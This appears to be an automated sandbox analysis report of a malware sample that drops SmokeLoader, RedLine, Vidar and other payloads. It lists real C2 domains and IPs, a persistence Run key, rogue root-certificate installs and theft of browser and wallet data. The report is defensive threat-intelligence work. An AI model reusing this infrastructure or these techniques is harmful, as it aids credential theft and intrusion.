Overview
overview
10Static
static
toolspab2 (1).exe
windows7_x64
10toolspab2 (1).exe
windows10_x64
10toolspab2 (10).exe
windows7_x64
10toolspab2 (10).exe
windows10_x64
10toolspab2 (11).exe
windows7_x64
10toolspab2 (11).exe
windows10_x64
10toolspab2 (12).exe
windows7_x64
10toolspab2 (12).exe
windows10_x64
10toolspab2 (13).exe
windows7_x64
10toolspab2 (13).exe
windows10_x64
10toolspab2 (14).exe
windows7_x64
10toolspab2 (14).exe
windows10_x64
10toolspab2 (15).exe
windows7_x64
10toolspab2 (15).exe
windows10_x64
10toolspab2 (16).exe
windows7_x64
10toolspab2 (16).exe
windows10_x64
10toolspab2 (17).exe
windows7_x64
10toolspab2 (17).exe
windows10_x64
10toolspab2 (18).exe
windows7_x64
10toolspab2 (18).exe
windows10_x64
10toolspab2 (19).exe
windows7_x64
10toolspab2 (19).exe
windows10_x64
10toolspab2 (2).exe
windows7_x64
10toolspab2 (2).exe
windows10_x64
10toolspab2 (20).exe
windows7_x64
10toolspab2 (20).exe
windows10_x64
10toolspab2 (21).exe
windows7_x64
10toolspab2 (21).exe
windows10_x64
10toolspab2 (22).exe
windows7_x64
10toolspab2 (22).exe
windows10_x64
10toolspab2 (23).exe
windows7_x64
10toolspab2 (23).exe
windows10_x64
10Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
297s -
max time network
1829s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
09-07-2021 23:00
Static task
static1
Behavioral task
behavioral1
Sample
toolspab2 (1).exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
toolspab2 (1).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
toolspab2 (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
toolspab2 (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
toolspab2 (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
toolspab2 (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
toolspab2 (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
toolspab2 (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
toolspab2 (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
toolspab2 (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
toolspab2 (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
toolspab2 (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
toolspab2 (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
toolspab2 (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
toolspab2 (16).exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
toolspab2 (16).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
toolspab2 (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
toolspab2 (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
toolspab2 (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
toolspab2 (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
toolspab2 (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
toolspab2 (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
toolspab2 (2).exe
Resource
win7v20210408
Behavioral task
behavioral24
Sample
toolspab2 (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
toolspab2 (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
toolspab2 (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
toolspab2 (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
toolspab2 (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
toolspab2 (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
toolspab2 (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
toolspab2 (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
toolspab2 (23).exe
Resource
win10v20210408
General
-
Target
toolspab2 (20).exe
-
Size
315KB
-
MD5
585c257e0b345b762e7cdc407d8f9da2
-
SHA1
ffee403d97b76c3460fc166b9d5ce1205cd216a5
-
SHA256
4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
-
SHA512
14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8
Malware Config
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
redline
1
45.32.235.238:45555
Extracted
metasploit
windows/single_exec
Extracted
redline
82.202.161.37:26317
Extracted
vidar
39.4
824
https://sergeevih43.tumblr.com/
-
profile_id
824
Extracted
vidar
39.4
517
https://sergeevih43.tumblr.com/
-
profile_id
517
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral25/memory/1856-200-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral25/memory/1856-199-0x0000000002C50000-0x0000000003576000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2616 1992 rUNdlL32.eXe 79 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral25/memory/1140-92-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral25/memory/1140-93-0x0000000000417E96-mapping.dmp family_redline behavioral25/memory/1140-95-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral25/memory/928-252-0x00000000007A0000-0x00000000007BB000-memory.dmp family_redline behavioral25/memory/928-255-0x0000000000860000-0x0000000000879000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral25/files/0x000400000001312b-183.dat family_socelars -
Vidar Stealer 5 IoCs
resource yara_rule behavioral25/memory/2092-259-0x0000000000220000-0x00000000002BD000-memory.dmp family_vidar behavioral25/memory/2092-260-0x0000000000400000-0x00000000004A4000-memory.dmp family_vidar behavioral25/memory/2148-311-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar behavioral25/memory/592-313-0x0000000000340000-0x00000000003DE000-memory.dmp family_vidar behavioral25/memory/2148-314-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 1596 A361.exe 1100 A545.exe 112 A7D5.exe 1136 AB6F.exe 856 AE3D.exe 1060 B521.exe 1252 BDD9.exe 1140 A7D5.exe 1276 912F.exe 972 AA7A.exe 1332 ADD5.exe 1836 ADD5.tmp 1540 912F.exe 1856 B91C.exe 996 taskkill.exe 864 C889.exe 420 D095.exe 112 1075474_ah_hot_iconçè_)))_.exe 928 D7C7.exe 1712 mlvdlryz.exe 1308 E704.exe 2092 timeout.exe 2152 912F.exe 2260 IpDIhVj3g.ExE 2920 912F.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral25/files/0x00040000000130e9-144.dat vmprotect behavioral25/memory/972-146-0x0000000000400000-0x0000000000651000-memory.dmp vmprotect behavioral25/files/0x00040000000130e9-151.dat vmprotect behavioral25/files/0x00040000000130e9-150.dat vmprotect behavioral25/files/0x00040000000130e9-149.dat vmprotect behavioral25/files/0x00040000000130e9-148.dat vmprotect behavioral25/files/0x00040000000130e9-162.dat vmprotect -
Deletes itself 1 IoCs
pid Process 1200 Process not Found -
Loads dropped DLL 22 IoCs
pid Process 1424 toolspab2 (20).exe 112 A7D5.exe 1252 BDD9.exe 1380 WerFault.exe 1380 WerFault.exe 1380 WerFault.exe 1332 ADD5.exe 1380 WerFault.exe 1836 ADD5.tmp 1836 ADD5.tmp 1836 ADD5.tmp 1276 912F.exe 1836 ADD5.tmp 1540 912F.exe 1540 912F.exe 2200 cmd.exe 2808 regsvr32.exe 2152 912F.exe 2092 timeout.exe 2092 timeout.exe 2092 timeout.exe 2092 timeout.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1688 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\683fc2d6-b311-4793-880c-7a1e921b3d26\\912F.exe\" --AutoStart" 912F.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 117 api.2ip.ua 122 api.2ip.ua 165 api.2ip.ua 255 ip-api.com 748 api.2ip.ua 753 api.2ip.ua -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 752 set thread context of 1424 752 toolspab2 (20).exe 29 PID 112 set thread context of 1140 112 A7D5.exe 37 PID 1276 set thread context of 1540 1276 912F.exe 54 PID 1712 set thread context of 1060 1712 mlvdlryz.exe 78 PID 2152 set thread context of 2920 2152 912F.exe 100 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1380 972 WerFault.exe 50 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BDD9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BDD9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BDD9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (20).exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2092 timeout.exe 1828 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2276 taskkill.exe 1028 taskkill.exe 996 taskkill.exe 2132 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b323db21ef60424edb47d450dd49d084297dce82e72baa49922fd1c78421dbf17ca6181cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691dd482497c34e0a8644490bdb67d2deb975f0dc5f0b554758df21d5904e0a56510df854b7d3ee6ab64419bdce0286682cd0934c8c4e4241dd69f460a33ffa26e10edc70f3252a0f40948f490b67d25e4905f0dc9f0b854718bce15515bb9fd3041ed85497d34e2a95c14c18d84a934d0a4dbe79f9d8d541de4ac743d04bafb2f4fb2c70f320dd49d642df4bd84e0d7f0bd2834fdc48d57d1f6ae743d04ccad680adf854b6a3fe4ab4a1fc18d844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d04cd745c24ed svchost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C889.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C889.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C889.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C889.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C889.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C889.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1424 toolspab2 (20).exe 1424 toolspab2 (20).exe 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1200 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 1424 toolspab2 (20).exe 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1252 BDD9.exe 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeShutdownPrivilege 1200 Process not Found Token: SeShutdownPrivilege 1200 Process not Found Token: SeShutdownPrivilege 1200 Process not Found Token: SeDebugPrivilege 1140 A7D5.exe Token: SeDebugPrivilege 1380 WerFault.exe Token: SeShutdownPrivilege 1200 Process not Found Token: SeShutdownPrivilege 1200 Process not Found Token: SeCreateTokenPrivilege 864 C889.exe Token: SeAssignPrimaryTokenPrivilege 864 C889.exe Token: SeLockMemoryPrivilege 864 C889.exe Token: SeIncreaseQuotaPrivilege 864 C889.exe Token: SeMachineAccountPrivilege 864 C889.exe Token: SeTcbPrivilege 864 C889.exe Token: SeSecurityPrivilege 864 C889.exe Token: SeTakeOwnershipPrivilege 864 C889.exe Token: SeLoadDriverPrivilege 864 C889.exe Token: SeSystemProfilePrivilege 864 C889.exe Token: SeSystemtimePrivilege 864 C889.exe Token: SeProfSingleProcessPrivilege 864 C889.exe Token: SeIncBasePriorityPrivilege 864 C889.exe Token: SeCreatePagefilePrivilege 864 C889.exe Token: SeCreatePermanentPrivilege 864 C889.exe Token: SeBackupPrivilege 864 C889.exe Token: SeRestorePrivilege 864 C889.exe Token: SeShutdownPrivilege 864 C889.exe Token: SeDebugPrivilege 864 C889.exe Token: SeAuditPrivilege 864 C889.exe Token: SeSystemEnvironmentPrivilege 864 C889.exe 